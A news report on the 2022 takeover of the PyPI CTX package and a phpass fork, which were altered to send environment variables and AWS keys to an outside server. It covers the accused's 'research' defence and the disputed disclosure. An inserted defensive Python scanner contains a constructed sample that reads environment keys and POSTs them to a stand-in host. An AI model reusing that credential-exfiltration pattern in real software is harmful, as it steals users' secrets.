Security ‘researcher’ hits back against claims of malicious CTX file uploads

A ‘security researcher’ accused of unethical activity through the alleged hijack of a popular open source project insists that their actions were not malicious.

Last week, as previously reported by The Daily Swig, social media users alerted the Python Package Index (PyPI) repository to a potentially malicious or hijacked package, CTX.

On May 22, Reddit user SocketPuppets promoted the package online, claiming it had received an update after lying dormant for roughly eight years.

The CTX Python library was available on both GitHub and PyPI. However, it wasn’t long before participants on a Reddit thread highlighted that the GitHub package had not been updated at the same time as the PyPI repository.

To make matters worse, the individual responsible also allegedly compromised a different package, phpass.

Indian hacker Somdev Sangwan said: “Python’s CTX library and a fork of PHP’s phpass have been compromised.”

Domain takeover

With an estimated three million downloads combined, the Python packages had been tampered with to send environment variables – such as AWS keys – to an external URL leading to a Heroku app.

Once alerted to the anomaly, PyPI removed the CTX package, explaining that the exfiltration method had been added after a perpetrator purchased a domain name for the expired email address used by the original developer, sent themselves a recovery password, and took over the account.

Users who installed the package between May 14 and May 22, 2022, may have had linked environment variables and credentials compromised.
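As an added illustration, not code from the article or from the CTX project, here is a small static check of the kind a defender might run over a freshly updated dependency before trusting it: it flags modules that both read environment variables and make outbound HTTP calls, the combination the tampered packages are reported to have used. The sample module sources, the collection URL and the lists of reader/sender names are constructed for the example.

```python
import ast

# Dotted names that read process environment variables (constructed list).
ENV_READERS = {"os.environ", "os.getenv"}
# Dotted names that send data over HTTP (constructed list, not exhaustive).
NET_SENDERS = {"requests.post", "requests.get", "requests.put",
               "urllib.request.urlopen", "urlopen",
               "http.client.HTTPConnection", "http.client.HTTPSConnection"}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    parts.append(node.id)
    return ".".join(reversed(parts))


def scan_module(source):
    """Statically look for env-variable reads combined with outbound HTTP calls."""
    env_reads, net_calls, urls = set(), set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Name, ast.Attribute)):
            name = dotted_name(node)
            if name in ENV_READERS or name.startswith("os.environ."):
                env_reads.add(name)
        if isinstance(node, ast.Call) and dotted_name(node.func) in NET_SENDERS:
            net_calls.add(dotted_name(node.func))
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(("http://", "https://")):
                urls.add(node.value)
    # Reading the environment alone is normal; reading it AND phoning home is not.
    suspicious = bool(env_reads) and bool(net_calls)
    return {"env_reads": sorted(env_reads), "net_calls": sorted(net_calls),
            "urls": sorted(urls), "suspicious": suspicious}


# Constructed sample mimicking the reported behaviour (not the real package code).
TAMPERED = '''
import os, requests
def init():
    keys = {k: v for k, v in os.environ.items() if "KEY" in k}
    requests.post("https://example.invalid/collect", json=keys)
'''

# Constructed benign sample: reads configuration from the environment only.
BENIGN = '''
import os
DEBUG = os.getenv("APP_DEBUG", "0") == "1"
'''

if __name__ == "__main__":
    for label, src in (("tampered", TAMPERED), ("benign", BENIGN)):
        print(label, scan_module(src))
```

A hit from this check is a prompt to read the diff between the GitHub source and the PyPI wheel by hand, which is exactly the mismatch the Reddit thread noticed.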

SocketPuppets (account since deleted) tried to defend their actions, claiming the unusual activity was due to a “new company account”.

The individual accused of the activity, Aydin, then published a Medium blog post to share their “side of the story”.

“All this research DOES NOT contain any malicious activity,” Aydin said. “I want to show how this simple attack affects +10M users and companies. ALL THE DATA THAT I RECEIVED IS DELETED AND NOT USED.”

‘Never responsibly disclosed’

According to Aydin, a ‘scraper tool’ and a bot were used to take over the packages. It cost $5 to register the expired domain.

Aydin added that he sent a report to the bug bounty platform HackerOne on May 15 that was closed as a duplicate a day later.

Their HackerOne profile does not appear to show an associated bug report.


Speaking to The Daily Swig, Sangwan said that the vulnerability “was never responsibly disclosed”, and “this was an actual attack”.

Sangwan added: “After taking over the package, the attacker posted about it on Reddit… and when other users started getting suspicious and I discovered another package they had compromised. The attacker came out and claimed that he did it for ‘research’.

“Replacing a popular software with a backdoored version that steals password[s] of people is anything but research.”

Source: https://portswigger.net/daily-swig/security-researcher-hits-back-against-claims-of-malicious-ctx-file-uploads
